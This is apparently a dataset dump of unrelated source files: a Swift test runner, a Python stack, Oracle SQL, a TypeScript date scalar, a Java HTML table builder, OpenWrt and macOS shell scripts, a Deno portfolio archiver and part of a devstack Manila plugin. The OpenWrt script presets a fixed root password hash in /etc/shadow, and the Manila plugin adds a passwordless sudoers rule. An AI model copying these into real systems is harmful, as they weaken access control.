text stringlengths 1 1.05M |
|---|
import TokamakTests
import XCTest
// Linux/SwiftPM XCTest entry point: collect every test case exported by the
// TokamakTests module's allTests() registry and hand them to XCTMain, which
// runs the suites and exits with an appropriate status code.
var tests = [XCTestCaseEntry]()
tests += TokamakTests.allTests()
XCTMain(tests) |
class Stack:
    """Simple LIFO stack backed by a Python list.

    The top of the stack is the end of the list, so push/pop/peek are O(1).
    """

    def __init__(self):
        # Underlying storage; the last element is the top of the stack.
        self.items = []

    def isEmpty(self):
        """Return True if the stack holds no items."""
        # Truthiness check is the idiomatic (and allocation-free) emptiness
        # test; behaves the same as the original `self.items == []`.
        return not self.items

    def push(self, item):
        """Place item on top of the stack."""
        self.items.append(item)

    def pop(self):
        """Remove and return the top item; raises IndexError when empty."""
        return self.items.pop()

    def peek(self):
        """Return the top item without removing it; raises IndexError when empty."""
        # Negative indexing replaces the original len(self.items)-1 arithmetic.
        return self.items[-1]

    def size(self):
        """Return the number of items on the stack."""
        return len(self.items)
<filename>INFO/Books Codes/Oracle Wait Interface A Practical Guide to Performance Diagnostics & Tuning/Chapter6_page177_1.sql
-- Report enqueue (lock) statistics that accumulated wait time, ordered so
-- the worst offenders appear last within each instance.
-- Oracle9i Database and above
select *
from v$enqueue_stat
where cum_wait_time > 0
order by inst_id, cum_wait_time;
-- Oracle 7.1.6 to 8.1.7
-- Pre-9i equivalent using the x$ksqst fixed table (gets/waits per lock type).
-- NOTE(review): x$ fixed tables are normally visible only to SYS unless
-- exposed through a view -- confirm the intended execution context.
select inst_id,
ksqsttyp "Lock",
ksqstget "Gets",
ksqstwat "Waits"
from x$ksqst
where ksqstwat > 0
order by inst_id, ksqstwat;
|
<reponame>joewood/refluxion
import Sequelize = require("sequelize");
var graphqlSeq = require("graphql-sequelize");
let {typeMapper, resolver, attributeFields, defaultListArgs, defaultArgs} = graphqlSeq;
import * as GraphQL from "graphql";
/**
 * Parse an incoming value (typically an ISO date string from a GraphQL
 * variable) into a `Date`.
 *
 * Returns `null` for falsy input and for values that do not parse to a
 * valid date. The original try/catch was dead code: `new Date` never throws
 * on bad input, it yields an Invalid Date whose time value is NaN, which
 * would previously leak through to callers.
 */
function fromISODate(value: any): Date | null {
    if (!value) return null;
    const parsed = new Date(value);
    if (isNaN(parsed.getTime())) {
        console.error("Error converting date", value);
        return null;
    }
    return parsed;
}
/**
 * Serialize a date-ish value to an ISO-8601 string for GraphQL output.
 * Falsy input yields null; non-Date values are coerced via `new Date` first.
 */
function toISODate(d: Date): any {
    if (!d) {
        return null;
    }
    // Coerce only when we did not already receive a real Date instance.
    const date = d instanceof Date ? d : new Date(d as any);
    return date.toISOString();
}
// Custom GraphQL scalar bridging JS Date values and ISO-8601 strings:
// `serialize` converts outgoing Dates to ISO strings, `parseValue` converts
// incoming variable values, and `parseLiteral` handles inline query literals.
export const GraphQLDate = new GraphQL.GraphQLScalarType({
name: "Date",
description: "A special custom Scalar type for Dates that converts to a ISO formatted string ",
serialize: toISODate,
parseValue: fromISODate,
// NOTE(review): ast.value is used unvalidated here, so a non-date literal
// produces an Invalid Date -- confirm whether upstream validation exists.
parseLiteral: (ast:any) => {
return new Date(ast.value);
}
});
|
<gh_stars>1-10
package com.ensoftcorp.open.dynadoc.core.wrapper;
import java.util.List;
import com.ensoftcorp.open.dynadoc.core.data.Issue;
import com.ensoftcorp.open.dynadoc.core.data.JavaClass;
import com.hp.gagawa.java.elements.A;
import com.hp.gagawa.java.elements.Div;
import com.hp.gagawa.java.elements.Table;
import com.hp.gagawa.java.elements.Tbody;
import com.hp.gagawa.java.elements.Td;
import com.hp.gagawa.java.elements.Tfoot;
import com.hp.gagawa.java.elements.Th;
import com.hp.gagawa.java.elements.Thead;
import com.hp.gagawa.java.elements.Tr;
public class ClassIssuesWrapper {
private static final String ISSUES_TABLE_JAVASCRIPT_FILE_NAME = "jquery-issues-table-script.js";
private static final String ISSUES_SECTION_HEADER = "Issue Summary";
private static final String ISSUES_TABLE_NAME = "issues-table";
private static final String [] ISSUES_TABLE_HEADERS = { "Issue Id", "Last Changed", "Summary", "Status", "Severity", "Priority", "Related Commits", "View Report" };
private List<Issue> issues;
public ClassIssuesWrapper(JavaClass javaClass) {
this.issues = javaClass.getIssues();
}
private List<Issue> getIssues() {
return this.issues;
}
public Div wrap() {
Div fieldsTableDiv = new Div();
fieldsTableDiv.setCSSClass("card text-white bg-secondary mb-3");
fieldsTableDiv.setStyle("max-width: 98%; margin: 10pt");
Div cardHeader = new Div();
cardHeader.setCSSClass("card-header");
cardHeader.appendText(ISSUES_SECTION_HEADER);
Div cardContent = new Div();
cardContent.setCSSClass("card-body bg-white text-dark");
Table table = new Table();
table.setId(ISSUES_TABLE_NAME);
table.setCSSClass("display small");
table.setStyle("width:100%");
Thead tHead = new Thead();
Tr tr = new Tr();
Th firstColumn = new Th();
tr.appendChild(firstColumn);
for(String headerText: ISSUES_TABLE_HEADERS) {
Th column = new Th();
column.appendText(headerText);
tr.appendChild(column);
}
tHead.appendChild(tr);
table.appendChild(tHead);
Tbody tBody = new Tbody();
List<Issue> issues = this.getIssues();
for(Issue issue: issues) {
Tr issueRow = this.wrapIssue(issue);
tBody.appendChild(issueRow);
}
table.appendChild(tBody);
Tfoot tFoot = new Tfoot();
tr = new Tr();
firstColumn = new Th();
tr.appendChild(firstColumn);
for(int i = 0; i < ISSUES_TABLE_HEADERS.length; i++) {
Th column = new Th();
tr.appendChild(column);
}
tFoot.appendChild(tr);
table.appendChild(tFoot);
cardContent.appendChild(table);
cardHeader.appendChild(cardContent);
fieldsTableDiv.appendChild(cardHeader);
return fieldsTableDiv;
}
private Tr wrapIssue(Issue issue) {
Tr row = new Tr();
Td showHideColumn = this.wrapShowHideIcon();
row.appendChild(showHideColumn);
Td idColumn = this.wrapId(issue);
row.appendChild(idColumn);
Td lastChanged = this.wrapLastChanged(issue);
row.appendChild(lastChanged);
Td summaryColumn = this.wrapSummary(issue);
row.appendChild(summaryColumn);
Td statusColumn = this.wrapStatus(issue);
row.appendChild(statusColumn);
Td severityColumn = this.wrapSeverity(issue);
row.appendChild(severityColumn);
Td priorityColumn = this.wrapPriority(issue);
row.appendChild(priorityColumn);
Td commitsColumn = this.wrapCommits(issue);
row.appendChild(commitsColumn);
Td urlColumn = this.wrapUrl(issue);
row.appendChild(urlColumn);
return row;
}
private Td wrapShowHideIcon() {
Td td = new Td();
td.setCSSClass("details-control");
return td;
}
private Td wrapId(Issue issue) {
Td td = new Td();
td.appendText(issue.id());
return td;
}
private Td wrapLastChanged(Issue issue) {
Td td = new Td();
td.appendText(issue.lastChanged());
return td;
}
private Td wrapSummary(Issue issue) {
Td td = new Td();
td.appendText(issue.summary());
return td;
}
private Td wrapStatus(Issue issue) {
Td td = new Td();
td.appendText(issue.status());
return td;
}
private Td wrapSeverity(Issue issue) {
Td td = new Td();
td.appendText(issue.severity());
return td;
}
private Td wrapPriority(Issue issue) {
Td td = new Td();
td.appendText(issue.priority());
return td;
}
private Td wrapCommits(Issue issue) {
Td td = new Td();
td.appendText(issue.associatedCommitsString());
return td;
}
private Td wrapUrl(Issue issue) {
Td td = new Td();
A link = new A();
link.setHref(issue.url());
link.setTarget("_blank");
link.setAttribute("role", "button");
link.setAttribute("class", "btn btn-primary");
link.appendText("Show");
td.appendChild(link);
return td;
}
}
|
#!/bin/bash
# Prune an OpenWrt/LEDE build tree down to the package set this firmware
# needs, then refresh feeds and patch package metadata before building.
shopt -s extglob
# Drop feed packages that are provided elsewhere or unwanted.
rm -rf feeds/jell/{diy,mt-drivers,shortcut-fe,luci-app-mtwifi,base-files}
# Remove packages whose Makefile only defines KernelPackage (no BuildPackage).
for ipk in $(find feeds/jell/* -maxdepth 0 -type d);
do
[[ "$(grep "KernelPackage" "$ipk/Makefile")" && ! "$(grep "BuildPackage" "$ipk/Makefile")" ]] && rm -rf $ipk || true
done
rm -rf package/{base-files,network/config/firewall,network/services/dnsmasq,network/services/ppp,system/opkg,libs/mbedtls}
rm -Rf feeds/luci/{applications,collections,protocols,themes,libs,docs,contrib}
rm -Rf feeds/luci/modules/!(luci-base)
# rm -rf feeds/packages/libs/!(libev|c-ares|cjson|boost|lib*|expat|tiff|freetype|udns|pcre2)
rm -Rf feeds/packages/!(lang|libs|devel|utils|net|multimedia)
rm -Rf feeds/packages/multimedia/!(gstreamer1)
rm -Rf feeds/packages/utils/!(pcsc-lite|xz)
rm -Rf feeds/packages/net/!(mosquitto|curl)
rm -Rf feeds/base/package/{kernel,firmware}
rm -Rf feeds/base/package/network/!(services|utils)
rm -Rf feeds/base/package/network/services/!(ppp)
rm -Rf feeds/base/package/network/utils/!(iwinfo|iptables)
rm -Rf feeds/base/package/utils/!(util-linux|lua)
rm -Rf feeds/base/package/system/!(opkg|ubus|uci|ca-certificates)
# Re-sync the feed indexes and install what is left.
./scripts/feeds update -a
./scripts/feeds install -a -p jell
./scripts/feeds install -a
# Strip LuCI ACL dependency declarations and legacy /cgi-bin URL prefixes.
sed -i 's/\(page\|e\)\?.acl_depends.*\?}//' `find package/feeds/jell/luci-*/luasrc/controller/* -name "*.lua"`
sed -i 's/\/cgi-bin\/\(luci\|cgi-\)/\/\1/g' `find package/feeds/jell/luci-*/ -name "*.lua" -or -name "*.htm*" -or -name "*.js"` &
# Optimize for speed instead of size.
sed -i 's/Os/O2/g' include/target.mk
#rm -rf ./feeds/packages/lang/golang
#svn co https://github.com/immortalwrt/packages/trunk/lang/golang feeds/packages/lang/golang
# Preset the root password hash and make tty1 respawn a login shell.
sed -i '/root:/c\root:$1$tTPCBw1t$ldzfp37h5lSpO9VXk4uUE\/:18336:0:99999:7:::' package/feeds/jell/base-files/files/etc/shadow
sed -i "s/tty1::askfirst/tty1::respawn/g" target/linux/*/base-files/etc/inittab
# Normalize package Makefile dependencies (drop luci/uhttpd, prefer
# nginx-ssl and python3, fix the lang feed path, use host upx).
sed -i \
-e "s/+\(luci\|luci-ssl\|uhttpd\)\( \|$\)/\2/" \
-e "s/+nginx\( \|$\)/+nginx-ssl\1/" \
-e 's/+python\( \|$\)/+python3/' \
-e 's?../../lang?$(TOPDIR)/feeds/packages/lang?' \
-e 's,$(STAGING_DIR_HOST)/bin/upx,upx,' \
package/feeds/jell/*/Makefile
# Stamp today's date into the firmware version strings.
date=`date +%m.%d.%Y`
sed -i -e "/\(# \)\?REVISION:=/c\REVISION:=$date" -e '/VERSION_CODE:=/c\VERSION_CODE:=$(REVISION)' include/version.mk
cp -f devices/common/.config .config
# Hide the base/packages feeds while running defconfig so only the trimmed
# package set lands in .config, then restore them.
mv feeds/base feeds/base.bak
mv feeds/packages feeds/packages.bak
make defconfig
rm -Rf tmp
mv feeds/base.bak feeds/base
mv feeds/packages.bak feeds/packages
sed -i 's/CONFIG_ALL=y/CONFIG_ALL=n/' .config
sed -i '/PACKAGE_kmod-/d' .config
sed -i "/mediaurlbase/d" package/feeds/*/luci-theme*/root/etc/uci-defaults/*
sed -i '/WARNING: Makefile/d' scripts/package-metadata.pl
# Make sure the build finds a python interpreter in the host staging dir.
if [ -f /usr/bin/python ]; then
ln -sf /usr/bin/python staging_dir/host/bin/python
else
ln -sf /usr/bin/python3 staging_dir/host/bin/python
fi
ln -sf /usr/bin/python3 staging_dir/host/bin/python3
# Use the prebuilt po2lmo translation compiler instead of building it.
cp -f devices/common/po2lmo staging_dir/host/bin/po2lmo
chmod +x staging_dir/host/bin/po2lmo
|
#!/bin/sh
# Prefer wired Ethernet on macOS: when the Ethernet link is active, turn
# Wi-Fi off; when it is inactive, turn Wi-Fi back on. Leaves Wi-Fi alone
# when it is the primary interface (en0).

# Detect the Wi-Fi and Ethernet device names (e.g. en0/en1) from the
# hardware port listing.
wifi=`/usr/sbin/networksetup -listallhardwareports | awk '/Hardware Port: Wi-Fi/,/Ethernet/' | awk 'NR==2' | cut -d " " -f 2`
ethernet=`/usr/sbin/networksetup -listallhardwareports | awk '/Hardware Port: Ethernet/,/Wi-Fi/' | awk 'NR==2' | cut -d " " -f 2`
EthStatus=`/sbin/ifconfig $ethernet | grep "status" | awk '{print $2}'`

# Fix: POSIX test(1) uses '=' for string comparison; '==' is a bashism that
# fails under strict /bin/sh implementations (e.g. dash).
if [ "$wifi" = "en0" ]; then
    echo "Wi-Fi is primary connection, exiting"
    exit 0
else
    # Check whether the Ethernet link has carrier.
    if [ "$EthStatus" = "active" ]; then
        echo "Ethernet active, disabling Wi-Fi"
        # Drop the interface first, then disable the network service so
        # macOS does not immediately re-join a network.
        ifconfig $wifi down
        sleep 2
        networksetup -setnetworkserviceenabled Wi-Fi off
    else
        echo "Ethernet inactive, enabling Wi-Fi"
        # Re-enable the service, give it a moment, then bring the link up.
        networksetup -setnetworkserviceenabled Wi-Fi on
        sleep 5
        ifconfig $wifi up
    fi
fi
// deno-lint-ignore-file camelcase
import { ensureDir } from 'https://deno.land/std@0.97.0/fs/ensure_dir.ts'
import { exists } from 'https://deno.land/std@0.103.0/fs/exists.ts'
import {
AnticipatedHttpError,
cachePath,
external,
getFilePath,
} from './cache.ts'
import * as html from './html-maker.ts'
import { me } from './me.ts'
import { stringToPath } from './utilts.ts'
// Response of /portfolios/init: provides the CSRF token required by the
// other portfolio endpoints.
type ApiPortfoliosInitResponse = {
data: {
csrfToken: string
hints: string[]
// eg https://asset-cdn.schoology.com/portfolios/assets/portfolio-078b8c30726f3f32d6d6.js
script: string
}
}
// File attachment metadata as returned by the portfolios API. `tempURI`
// is the (expiring) download link used by archivePortfolios.
type FileInfo = {
id: number
fileId: number | null
type: number
tempURI: string
publicURI: string | null
filename: string
filemime: string
md5Checksum: string
conversionFailed: boolean
conversionPending: boolean
pdfConversion: null
swfConversion: null
image_presets?: {
profile_reg: string
profile_sm: string
profile_tiny: string
profile_big: string
album_thumbnail: string
album_large: string
album_source: string
}
}
// Fields shared by portfolios, items, and item metadata records.
type ApiPortfolioThingBase = {
id: number
created_at: string
updated_at: string
file_info: FileInfo | null
cropped_file_info: FileInfo | null
}
// Fields shared by portfolios and portfolio items (title, cover file, crop).
interface ApiPortfolioOrItem extends ApiPortfolioThingBase {
title: string
description: string
file_id: number | null
color_code: null
use_file_id: 0 | 1
position: string // eg "-g" or "g" or "i" or "-h" ??
cropped_file_id: number | null
crop_info: {
xoffset: number
yoffset: number
width: number
height: number
} | null
}
// A portfolio record as listed for a user.
interface ApiPortfolio extends ApiPortfolioOrItem {
public_hash: string
user_id: number
published: boolean
editable: boolean
public_share_url: string
item_count: number
}
// Response of /portfolios/users/{id}/portfolios.
type ApiUserPortfoliosResponse = {
data: {
canExport: boolean
editable: boolean
/** A datetime in the form of `2021-07-29 00:18:26 -0700` */
updated_at: string
portfolios: ApiPortfolio[]
}
}
// Item-specific fields: owning portfolio plus sibling links.
interface ApiItemThing extends ApiPortfolioOrItem {
portfolio_id: number
deck_id: null
previous_id: number | null
next_id: number | null
}
// Discriminated union over `item_type`; each variant carries its own
// metadata shape (page content, external link, assignment, or file).
type ApiItemType =
| {
item_type: 'page'
metadata: ApiPortfolioThingBase & {
portfolio_item_id: number
content: string
}
}
| {
item_type: 'link'
metadata: ApiPortfolioThingBase & {
portfolio_item_id: number
url: string
x_frame_options: string // can be empty
absolute_url: string
url_type: 'iframe'
}
}
| {
item_type: 'assignment'
metadata: ApiPortfolioThingBase & {
portfolio_item_id: number
file_id: number
submission_id: number
revision_id: number // or is this 0 | 1?
grade_item_id: number
}
}
| {
item_type: 'file'
metadata: ApiPortfolioThingBase & {
portfolio_item_id: number
file_id: number
}
}
// A fully-typed portfolio item: common fields plus its typed variant.
type ApiItem = ApiItemThing & ApiItemType
// Response of /portfolios/users/{id}/portfolios/{portfolioId}.
type ApiPortfolioResponse = {
data: ApiPortfolio & {
previous_id: number | null
next_id: number | null
items: ApiItem[]
}
}
/**
 * Archive all portfolios for a user: download each item's attached file
 * (skipping files already on disk) and render an index.html per portfolio
 * summarizing its items.
 *
 * @param userId Schoology user ID whose portfolios are fetched.
 * @param path Output directory root; a `portfolios/<id>_<title>/` folder is
 * created per portfolio underneath it.
 */
export async function archivePortfolios (
userId: number,
path = `./output/users/${userId}/`,
): Promise<void> {
// The portfolios endpoints require a CSRF token obtained from /init.
const {
data: { csrfToken },
}: ApiPortfoliosInitResponse = await cachePath('/portfolios/init')
// A 404 (user has no portfolios) is surfaced as AnticipatedHttpError and
// mapped to null; any other failure is rethrown.
const portfolios: ApiUserPortfoliosResponse | null = await cachePath(
`/portfolios/users/${userId}/portfolios`,
'json',
{ headers: { 'X-Csrf-Token': csrfToken }, allow404: true },
).catch(err =>
err instanceof AnticipatedHttpError ? null : Promise.reject(err),
)
if (!portfolios) return
for (const { id, title, description } of portfolios.data.portfolios) {
const outPath = `${path}portfolios/${id}_${stringToPath(title)}/`
const { data: portfolio }: ApiPortfolioResponse = await cachePath(
`/portfolios/users/${userId}/portfolios/${id}`,
'json',
{ headers: { 'X-Csrf-Token': csrfToken } },
)
await ensureDir(outPath)
// First pass: detect whether any item's file is missing on disk.
// File names are `<itemId>_<sanitized-stem><extension>`.
let needDownload = false
outer: for (const item of portfolio.items) {
for (const fileInfo of [item.file_info, item.metadata.file_info]) {
if (fileInfo) {
const path = `${outPath}${item.id}_${stringToPath(
fileInfo.filename.slice(0, fileInfo.filename.lastIndexOf('.')),
)}${fileInfo.filename.slice(fileInfo.filename.lastIndexOf('.'))}`
if (!(await exists(path))) {
needDownload = true
break outer
}
}
}
}
if (needDownload) {
// Try to get new, unstale download links by clearing the cache and
// re-fetching it
// (tempURI links expire, so the cached portfolio JSON may hold dead
// URLs; this shadowed `portfolio` is local to the download pass.)
const reqPath = `/portfolios/users/${userId}/portfolios/${id}`
const oldCachePath = getFilePath(reqPath, 'json')
await Deno.remove(oldCachePath)
const { data: portfolio }: ApiPortfolioResponse = await cachePath(
`/portfolios/users/${userId}/portfolios/${id}`,
'json',
{ headers: { 'X-Csrf-Token': csrfToken }, retryOn404Or500: true },
)
for (const item of portfolio.items) {
for (const fileInfo of [item.file_info, item.metadata.file_info]) {
if (fileInfo) {
const path = `${outPath}${item.id}_${stringToPath(
fileInfo.filename.slice(0, fileInfo.filename.lastIndexOf('.')),
)}${fileInfo.filename.slice(fileInfo.filename.lastIndexOf('.'))}`
await cachePath(external(fileInfo.tempURI), 'file', {
cachePath: path,
})
}
}
}
}
// Render the portfolio index page: metadata header plus a two-column
// table (name/description, content preview) with one row per item.
await Deno.writeTextFile(
outPath + 'index.html',
html.page(
html.style(
html.raw(
[
'table {',
'border-collapse: collapse;',
'}',
'th,',
'td {',
'border: 1px solid currentColor;',
'}',
].join(''),
),
),
// html.base({ href: root }),
html.h1(title),
html.p(description),
html.p(
html.em(
`Created ${portfolio.created_at}`,
portfolio.created_at !== portfolio.updated_at &&
`, edited ${portfolio.updated_at}`,
),
),
html.table(
html.tr(html.th('Name and description'), html.th('Content')),
portfolio.items.map(item => {
const fileInfo = item.file_info || item.metadata.file_info
// Inline preview for images/audio/PDF; plain link otherwise.
let fileInfoHtml = null
if (fileInfo) {
const path = `./${item.id}_${stringToPath(
fileInfo.filename.slice(0, fileInfo.filename.lastIndexOf('.')),
)}${fileInfo.filename.slice(fileInfo.filename.lastIndexOf('.'))}`
fileInfoHtml = [
html.a({ href: path }, fileInfo.filename),
'\n',
fileInfo.filemime.startsWith('image/')
? html.img({ src: path, style: { 'max-width': '60vw' } })
: fileInfo.filemime.startsWith('audio/')
? html.audio({ src: path, controls: true })
: fileInfo.filemime === 'application/pdf'
? html.iframe({
src: path,
style: { width: '60vw', height: '40vw' },
})
: null,
]
}
return html.tr(
html.td(
html.strong(item.title),
'\n',
item.description,
'\n',
html.em(
`Created ${item.created_at}`,
item.created_at !== item.updated_at &&
`, edited ${item.updated_at}`,
),
),
html.td(
item.item_type === 'page'
? html.raw(item.metadata.content)
: item.item_type === 'link'
? html.a(
{ href: item.metadata.absolute_url },
html.strong('Link'),
)
: null,
fileInfoHtml,
),
)
}),
),
),
)
}
}
// Allow running this module directly: archive the current user's portfolios
// into a hard-coded output directory.
if (import.meta.main) {
await archivePortfolios(me.id, './output/users/2017219_Sean_Yen/')
}
|
#!/bin/bash
# Plugin file for enabling manila services
# ----------------------------------------
# Save trace setting
XTRACE=$(set +o | grep xtrace)
set -o xtrace
# Entry Points
# ------------
# _clean_share_group - unmount and remove every LVM logical volume in
# volume group $1 whose name carries the prefix $2, along with its mount
# directory under $MANILA_MNT_DIR.
function _clean_share_group {
local vg=$1
local vg_prefix=$2
# Clean out existing shares
for lv in `sudo lvs --noheadings -o lv_name $vg`; do
# vg_prefix prefixes the LVs we want
if [[ "${lv#$vg_prefix}" != "$lv" ]]; then
sudo umount -f $MANILA_MNT_DIR/$lv
sudo lvremove -f $vg/$lv
sudo rm -rf $MANILA_MNT_DIR/$lv
fi
done
}
# _clean_manila_lvm_backing_file - detach the loop device and delete the
# devstack-created backing file for volume group $1, but only when the VG
# no longer contains any logical volumes.
function _clean_manila_lvm_backing_file {
local vg=$1
# if there is no logical volume left, it's safe to attempt a cleanup
# of the backing file
if [ -z "`sudo lvs --noheadings -o lv_name $vg`" ]; then
# if the backing physical device is a loop device, it was probably setup by devstack
VG_DEV=$(sudo losetup -j $DATA_DIR/${vg}-backing-file | awk -F':' '/backing-file/ { print $1
}')
if [[ -n "$VG_DEV" ]]; then
sudo losetup -d $VG_DEV
rm -f $DATA_DIR/${vg}-backing-file
fi
fi
}
# _clean_zfsonlinux_data - destroy any zpools whose names match files in
# the ZFSonLinux backend container directory and remove those files.
function _clean_zfsonlinux_data {
for filename in "$MANILA_ZFSONLINUX_BACKEND_FILES_CONTAINER_DIR"/*; do
if [[ $(sudo zpool list | grep $filename) ]]; then
echo "Destroying zpool named $filename"
sudo zpool destroy -f $filename
# NOTE(review): $filename already expands to a full path from the glob
# above, so prepending the container dir again here looks doubled --
# verify the intended path before relying on this cleanup.
file="$MANILA_ZFSONLINUX_BACKEND_FILES_CONTAINER_DIR$filename"
echo "Destroying file named $file"
rm -f $file
fi
done
}
# cleanup_manila - Remove residual data files, anything left over from previous
# runs that a clean run would need to clean up
function cleanup_manila {
# All stuff, that are created by share drivers will be cleaned up by other services.
_clean_share_group $SHARE_GROUP $SHARE_NAME_PREFIX
_clean_manila_lvm_backing_file $SHARE_GROUP
_clean_zfsonlinux_data
if [ $(trueorfalse False MANILA_USE_UWSGI) == True ]; then
remove_uwsgi_config "$MANILA_UWSGI_CONF" "$MANILA_WSGI"
fi
}
# _config_manila_apache_wsgi() - Configure manila-api wsgi application.
function _config_manila_apache_wsgi {
local manila_api_apache_conf
local venv_path=""
manila_api_apache_conf=$(apache_site_config_for manila-api)
# Instantiate the Apache vhost template, substituting the placeholders.
sudo cp $MANILA_DIR/devstack/apache-manila.template $manila_api_apache_conf
sudo sed -e "
s|%APACHE_NAME%|$APACHE_NAME|g;
s|%MANILA_BIN_DIR%|$MANILA_BIN_DIR|g;
s|%PORT%|$REAL_MANILA_SERVICE_PORT|g;
s|%APIWORKERS%|$API_WORKERS|g;
s|%USER%|$STACK_USER|g;
" -i $manila_api_apache_conf
}
# configure_default_backends - configures default Manila backends with generic driver.
function configure_default_backends {
# Configure two default backends with generic drivers onboard
for group_name in $MANILA_BACKEND1_CONFIG_GROUP_NAME $MANILA_BACKEND2_CONFIG_GROUP_NAME; do
iniset $MANILA_CONF $group_name share_driver $SHARE_DRIVER
if [ "$MANILA_BACKEND1_CONFIG_GROUP_NAME" == "$group_name" ]; then
iniset $MANILA_CONF $group_name share_backend_name $MANILA_SHARE_BACKEND1_NAME
else
iniset $MANILA_CONF $group_name share_backend_name $MANILA_SHARE_BACKEND2_NAME
fi
iniset $MANILA_CONF $group_name path_to_public_key $MANILA_PATH_TO_PUBLIC_KEY
iniset $MANILA_CONF $group_name path_to_private_key $MANILA_PATH_TO_PRIVATE_KEY
iniset $MANILA_CONF $group_name service_image_name $MANILA_SERVICE_IMAGE_NAME
iniset $MANILA_CONF $group_name service_instance_user $MANILA_SERVICE_INSTANCE_USER
iniset $MANILA_CONF $group_name driver_handles_share_servers True
# Container driver needs extra neutron wiring options.
if [ "$SHARE_DRIVER" == $MANILA_CONTAINER_DRIVER ]; then
iniset $MANILA_CONF $group_name network_api_class $MANILA_NETWORK_API_CLASS
iniset $MANILA_CONF $group_name neutron_host_id $(hostname)
iniset $MANILA_CONF $group_name neutron_vnic_type $MANILA_NEUTRON_VNIC_TYPE
fi
if [ $(trueorfalse False MANILA_USE_SERVICE_INSTANCE_PASSWORD) == True ]; then
iniset $MANILA_CONF $group_name service_instance_password $MANILA_SERVICE_INSTANCE_PASSWORD
fi
if [ "$SHARE_DRIVER" == "manila.share.drivers.generic.GenericShareDriver" ]; then
iniset $MANILA_CONF $group_name ssh_conn_timeout $MANILA_SSH_TIMEOUT
fi
done
}
# set_config_opts - this allows to set any config opt to any config group,
# parsing env vars by prefix special 'MANILA_OPTGROUP_'.
function set_config_opts {
# expects only one param - name of config group(s) as list separated by commas
GROUP_NAMES=$1
if [[ -n "$GROUP_NAMES" ]]; then
for be in ${GROUP_NAMES//,/ }; do
# get backend_specific opt values
prefix=MANILA_OPTGROUP_$be\_
# Enumerate shell variables (posix mode omits functions) and pick the
# ones matching MANILA_OPTGROUP_<group>_<opt>=<value>.
( set -o posix ; set ) | grep ^$prefix | while read -r line ; do
# parse it to opt names and values
opt=${line#$prefix}
opt_name=${opt%%=*}
opt_value=${opt##*=}
iniset $MANILA_CONF $be $opt_name $opt_value
done
done
fi
}
# set_cinder_quotas - Sets Cinder quotas, that is useful for generic driver,
# which uses Cinder volumes and snapshots.
function set_cinder_quotas {
# Update Cinder configuration to make sure default quotas are enough
# for Manila using Generic driver with parallel testing.
if is_service_enabled cinder; then
if [[ ! "$CINDER_CONF" ]]; then
CINDER_CONF=/etc/cinder/cinder.conf
fi
iniset $CINDER_CONF DEFAULT quota_volumes 50
iniset $CINDER_CONF DEFAULT quota_snapshots 50
iniset $CINDER_CONF DEFAULT quota_gigabytes 1000
fi
done_marker_unused_placeholder=
}
# set_backend_availability_zones - assign a distinct backend_availability_zone
# ("manila-zone-N") to every enabled backend that is NOT using the generic
# driver (generic-driver zones must match Nova/Cinder zones).
function set_backend_availability_zones {
ENABLED_BACKENDS=$1
echo_summary "Setting up backend_availability_zone option \
for any enabled backends that do not use the Generic driver. \
Availability zones for the Generic driver must coincide with those \
created for Nova and Cinder."
local zonenum
generic_driver='manila.share.drivers.generic.GenericShareDriver'
for BE in ${ENABLED_BACKENDS//,/ }; do
share_driver=$(iniget $MANILA_CONF $BE share_driver)
if [[ $share_driver != $generic_driver ]]; then
zone="manila-zone-$((zonenum++))"
iniset $MANILA_CONF $BE backend_availability_zone $zone
fi
done
}
# configure_manila - Set config files, create data dirs, etc
function configure_manila {
if [[ ! -d $MANILA_CONF_DIR ]]; then
sudo mkdir -p $MANILA_CONF_DIR
fi
sudo chown $STACK_USER $MANILA_CONF_DIR
if [[ -f $MANILA_DIR/etc/manila/policy.json ]]; then
cp -p $MANILA_DIR/etc/manila/policy.json $MANILA_CONF_DIR
fi
# Set the paths of certain binaries
MANILA_ROOTWRAP=$(get_rootwrap_location manila)
# If Manila ships the new rootwrap filters files, deploy them
# (owned by root) and add a parameter to $MANILA_ROOTWRAP
ROOTWRAP_MANILA_SUDOER_CMD="$MANILA_ROOTWRAP"
if [[ -d $MANILA_DIR/etc/manila/rootwrap.d ]]; then
# Wipe any existing rootwrap.d files first
if [[ -d $MANILA_CONF_DIR/rootwrap.d ]]; then
sudo rm -rf $MANILA_CONF_DIR/rootwrap.d
fi
# Deploy filters to /etc/manila/rootwrap.d
sudo mkdir -m 755 $MANILA_CONF_DIR/rootwrap.d
sudo cp $MANILA_DIR/etc/manila/rootwrap.d/*.filters $MANILA_CONF_DIR/rootwrap.d
sudo chown -R root:root $MANILA_CONF_DIR/rootwrap.d
sudo chmod 644 $MANILA_CONF_DIR/rootwrap.d/*
# Set up rootwrap.conf, pointing to /etc/manila/rootwrap.d
sudo cp $MANILA_DIR/etc/manila/rootwrap.conf $MANILA_CONF_DIR/
sudo sed -e "s:^filters_path=.*$:filters_path=$MANILA_CONF_DIR/rootwrap.d:" -i $MANILA_CONF_DIR/rootwrap.conf
sudo chown root:root $MANILA_CONF_DIR/rootwrap.conf
sudo chmod 0644 $MANILA_CONF_DIR/rootwrap.conf
# Specify rootwrap.conf as first parameter to manila-rootwrap
MANILA_ROOTWRAP="$MANILA_ROOTWRAP $MANILA_CONF_DIR/rootwrap.conf"
ROOTWRAP_MANILA_SUDOER_CMD="$MANILA_ROOTWRAP *"
fi
# Allow the stack user to run manila-rootwrap via sudo without a password.
TEMPFILE=`mktemp`
echo "$USER ALL=(root) NOPASSWD: $ROOTWRAP_MANILA_SUDOER_CMD" >$TEMPFILE
chmod 0440 $TEMPFILE
sudo chown root:root $TEMPFILE
sudo mv $TEMPFILE /etc/sudoers.d/manila-rootwrap
cp $MANILA_DIR/etc/manila/api-paste.ini $MANILA_API_PASTE_INI
# Remove old conf file if exists
rm -f $MANILA_CONF
# Core manila.conf options: auth, scheduler, database, rootwrap, paths.
configure_keystone_authtoken_middleware $MANILA_CONF manila
iniset $MANILA_CONF DEFAULT auth_strategy keystone
iniset $MANILA_CONF DEFAULT debug True
iniset $MANILA_CONF DEFAULT scheduler_driver $MANILA_SCHEDULER_DRIVER
iniset $MANILA_CONF DEFAULT share_name_template ${SHARE_NAME_PREFIX}%s
iniset $MANILA_CONF DATABASE connection `database_connection_url manila`
iniset $MANILA_CONF DATABASE max_pool_size 40
iniset $MANILA_CONF DEFAULT api_paste_config $MANILA_API_PASTE_INI
iniset $MANILA_CONF DEFAULT rootwrap_config $MANILA_CONF_DIR/rootwrap.conf
